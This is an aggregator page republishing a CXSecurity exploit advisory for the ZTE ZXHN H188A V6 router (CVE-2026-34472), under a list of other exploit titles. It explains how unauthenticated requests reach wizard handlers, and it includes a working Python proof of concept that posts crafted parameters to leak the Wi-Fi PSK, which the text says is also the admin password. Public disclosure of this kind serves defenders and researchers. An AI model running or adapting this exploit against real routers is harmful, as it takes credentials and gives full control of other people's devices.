惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

量子位
博客园_首页
罗磊的独立博客
云风的 BLOG
云风的 BLOG
J
Java Code Geeks
Last Week in AI
Last Week in AI
D
DataBreaches.Net
Jina AI
Jina AI
博客园 - Franky
大猫的无限游戏
大猫的无限游戏
Apple Machine Learning Research
Apple Machine Learning Research
V
V2EX
D
Docker
MongoDB | Blog
MongoDB | Blog
B
Blog RSS Feed
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
宝玉的分享
宝玉的分享
Engineering at Meta
Engineering at Meta
The Cloudflare Blog
博客园 - 三生石上(FineUI控件)
有赞技术团队
有赞技术团队
人人都是产品经理
人人都是产品经理
H
Help Net Security
T
The Blog of Author Tim Ferriss

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution
ZTE ZXHN H188A V6 Authentication Bypass
Mina Nageh S · 2026-06-15 · via CXSECURITY Database RSS Feed - CXSecurity.com

ZTE ZXHN H188A V6 Authentication Bypass

# Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass # Date: 2026-05-20 # Exploit Author: Mina Nageh Salalma (Monx Research) # Vendor Homepage: https://www.zte.com.cn # Software Link: https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router # Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE # Tested on: ZTE ZXHN H188A V6.0.10P2_TE # CVE: CVE-2026-34472 # Description: # Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware # can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and # PPPoE usernames. The leaked Wi-Fi password is also the default administrator # password after uppercasing, resulting in full authentication bypass. # # Root cause: router_logic_impl.lua accepts _type and _tag directly for # empty-path requests. urlpath_2type_modifier.lua only applies QuickSetupEnable # when _type is missing. Wizard handlers then expose credential-bearing read # actions (getPassword, wlan_get, ppp_get) for unauthenticated users. # # Approximately 500 publicly exposed H188A interfaces were reachable at # time of original report (May 2024). ZTE PSIRT stopped responding; CVE # assigned by MITRE on 2026-03-27 after escalation. # # MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472 # PoC - Trigger wizard credential endpoint (Python 3 / requests) import requests import sys def exploit(target): url = f"http://{target}/" # Craft request with _type parameter to bypass QuickSetupEnable gate params = {"_type": "loginData", "_tag": "login_entry"} headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"} try: r = requests.post(url, params=params, headers=headers, data=data, timeout=10, verify=False) print(f"[+] {target} HTTP {r.status_code}") print(r.text[:2000]) except Exception as e: print(f"[-] {target}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: poc.py <target_ip>") sys.exit(1) exploit(sys.argv[1])



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com

Back to Top